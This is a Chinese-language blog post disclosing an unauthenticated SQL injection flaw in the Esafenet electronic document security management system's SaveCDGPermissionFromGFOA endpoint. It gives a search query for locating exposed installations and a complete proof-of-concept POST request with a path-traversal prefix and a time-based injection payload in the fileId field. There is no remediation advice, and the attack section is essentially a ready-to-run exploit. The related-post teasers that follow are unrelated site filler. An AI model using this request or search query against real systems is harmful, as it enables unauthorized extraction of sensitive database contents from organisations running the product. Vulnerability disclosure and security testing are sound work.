SQL注入漏洞

guozi • 2024年6月5日下午3:19 • 行业资讯

漏洞信息

由于亿赛通电子文档安全管理系统SaveCDGPermissionFromGFOA处fileID对传入的数据没有预编译和充足的校验，导致该接口存在SQL注入漏洞，未授权的攻击者可获取数据库敏感信息。

漏洞信息

漏洞复现

复现信息

语法：

app='亿赛通-电子文档安全管理系统'

测绘搜索

POC：

POST /CDGServer3/js/../SaveCDGPermissionFromGFOA HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 39Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencoded
fileId=1';WAITFOR DELAY '0:0:2'--&pis=1

漏洞复现

复现信息

复现-1

复现-2

更多内容

发现更多

原创文章，作者：guozi，如若转载，请注明出处：https://www.sudun.com/ask/90243.html

赞 (0)

0 0

要避免的 9 个 SQL 错误

上一篇 2024年6月5日下午3:02

SqlSugar，就这个Feel 倍儿爽！

下一篇 2024年6月5日下午3:20

如何获得永久免费的虚拟主机空间？

你是否也曾遇到过想要建立个人网站或是小型企业官网，却因为高昂的虚拟主机费用而望而却步的情况？那么，你一定不能错过今天的主题——如何获得永久免费的虚拟主机空间？什么是虚拟主机？它有哪…

牛晓晓
行业资讯 2024年4月20日
00
大连虚拟主机

想要在互联网上搭建自己的网站，除了域名和网站设计之外，还需要一个稳定的服务器才能保证网站的正常运行。而虚拟主机作为一种相对便宜且适合个人和小型企业使用的服务器，受到了越来越多人的青…

牛晓晓
行业资讯 2024年4月11日
00
域名被墙要去哪解决，域名被墙解决办法

（2）检查其他设备：如果在其他设备上尝试访问域名时出现同样的问题，则可能是DNS污染造成的。（3）命令行发现：可以使用nslookup、dig等命令行工具查询某个域名的IP地址。…

牛晓晓
行业资讯 2024年5月16日
00
怎么改手机ip

你是否曾经遇到过因为手机IP地址问题而无法访问某些网站的尴尬？想要解决这个问题，你需要知道什么是IP地址及其作用。而更重要的是，你需要了解如何改变手机IP地址。今天，我们就来探讨一…

牛晓晓
行业资讯 2024年3月29日
00

发表回复